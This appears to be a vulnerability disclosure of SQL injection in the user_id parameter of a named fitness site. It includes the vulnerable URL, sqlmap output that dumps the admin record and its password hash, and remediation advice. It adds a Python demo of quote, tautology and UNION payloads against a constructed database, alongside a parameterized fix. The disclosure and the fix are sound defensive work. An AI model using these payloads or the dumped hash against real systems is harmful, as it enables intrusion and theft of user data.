SQL injection vulnerability on the nationwide fitness network platform
A SQL injection vulnerability in the nationwide fitness network platform (www.yiqizou.com) lets an attacker read the backend database, including a large amount of users' personal information and the administrator account record.
Decompiling the Android app's code reveals the following URL:
http://www.yiqizou.com/get_map_info.php?user_id=121
Requesting it in the browser with a modified user_id value returns a database error, which indicates that the user_id parameter is passed unsafely into a query.
A sqlmap scan confirms the injection point: user_id.
Databases:
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] yqz_wx
[*] yqztest
Database: yqz_wx
[12 tables]
+----------------------+
| wx_yqz_access_log    |
| wx_yqz_access_stat   |
| wx_yqz_admin         |
| wx_yqz_album         |
| wx_yqz_album_setting |
| wx_yqz_article       |
| wx_yqz_data_cache    |
| wx_yqz_feedback      |
| wx_yqz_follow_prize  |
| wx_yqz_reply         |
| wx_yqz_setting       |
| wx_yqz_user          |
+----------------------+
Database: yqz_wx
Table: wx_yqz_admin
[1 entry]
+----+-----+---------+----------------------------------+--------+------------+----------+------------+------------+------------+-------------+
| id | aid | groupid | psw                              | status | loginip    | username | valid tive | logintime  | logincount | regdateline |
+----+-----+---------+----------------------------------+--------+------------+----------+------------+------------+------------+-------------+
| 1  | 1   | 1       | be57c7cee28c3f1354d1e4f3734c34ce | 1      | 2147483647 | admin    | 0          | 1400728157 | 25         | 1372165843  |
+----+-----+---------+----------------------------------+--------+------------+----------+------------+------------+------------+-------------+
Solution:
Do not splice user_id into the SQL string. Validate it as a plain integer and pass it to the database through a prepared statement (parameter binding) in get_map_info.php and every other script that takes a user-controlled value; "filtering" by blacklisting characters is not a reliable fix on its own. Also give the web application's database account only the privileges it needs, so that a remaining injection cannot read unrelated tables such as wx_yqz_admin.
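The probe described above (a bad user_id value producing a database error, then a payload that reads other rows and other tables) and the parameterized fix recommended in the solution, as an added worked example that is not part of the original report. It models a get_map_info.php-style handler with an in-memory SQLite database; the rows, the wx_yqz_user columns and the placeholder password hash are constructed for the example, and the handler and helper names are assumptions, not the site's real code.

```python
"""Added example: a toy get_map_info handler, the error-based probe, the data
exposure, and the parameterized fix. SQLite in-memory; all rows are constructed."""
import re
import sqlite3


def make_db():
    """Build a constructed database with the two table names seen in the report."""
    conn = sqlite3.connect(":memory:")
    # Columns of wx_yqz_user are assumed; only the table name comes from the report.
    conn.execute("CREATE TABLE wx_yqz_user (id INTEGER PRIMARY KEY, nickname TEXT, phone TEXT)")
    conn.executemany(
        "INSERT INTO wx_yqz_user VALUES (?, ?, ?)",
        [(120, "alice", "13800000120"), (121, "bob", "13800000121"), (122, "carol", "13800000122")],
    )
    # Minimal stand-in for wx_yqz_admin; the hash value is a placeholder, not real data.
    conn.execute("CREATE TABLE wx_yqz_admin (id INTEGER PRIMARY KEY, username TEXT, psw TEXT)")
    conn.execute("INSERT INTO wx_yqz_admin VALUES (1, 'admin', 'constructed-md5-placeholder')")
    return conn


def get_map_info_vulnerable(conn, user_id):
    """The pattern implied by the report: user_id is spliced straight into the SQL text."""
    sql = f"SELECT id, nickname, phone FROM wx_yqz_user WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def get_map_info_fixed(conn, user_id):
    """Hardened handler: accept only a plain decimal integer, then bind it as a parameter."""
    if not isinstance(user_id, str) or not re.fullmatch(r"[0-9]{1,10}", user_id):
        raise ValueError("user_id must be a positive integer")
    sql = "SELECT id, nickname, phone FROM wx_yqz_user WHERE id = ?"
    return conn.execute(sql, (int(user_id),)).fetchall()


def probe(handler, conn, payload):
    """Send one payload and classify the outcome, as the report did by hand in the browser.

    Returns ('ok', rows), ('error', message) for a database error (the injection
    indicator), or ('rejected', message) when the hardened handler refuses the input.
    """
    try:
        return ("ok", handler(conn, payload))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    except ValueError as exc:
        return ("rejected", str(exc))


# Payloads in the order an assessment would try them: the legitimate value, a single
# quote to provoke an error, a tautology to read every user, and a UNION to reach
# the admin table (the cross-table read that sqlmap's dump performed).
PAYLOADS = [
    "121",
    "121'",
    "121 OR 1=1",
    "0 UNION SELECT id, username, psw FROM wx_yqz_admin",
]

if __name__ == "__main__":
    db = make_db()
    for name, handler in (("vulnerable", get_map_info_vulnerable), ("fixed", get_map_info_fixed)):
        for p in PAYLOADS:
            print(name, repr(p), "->", probe(handler, db, p))
```

Run it to see the vulnerable handler return a syntax error for `121'`, all three users for `121 OR 1=1`, and the admin row for the UNION payload, while the fixed handler answers the legitimate id and rejects everything else before it reaches the database.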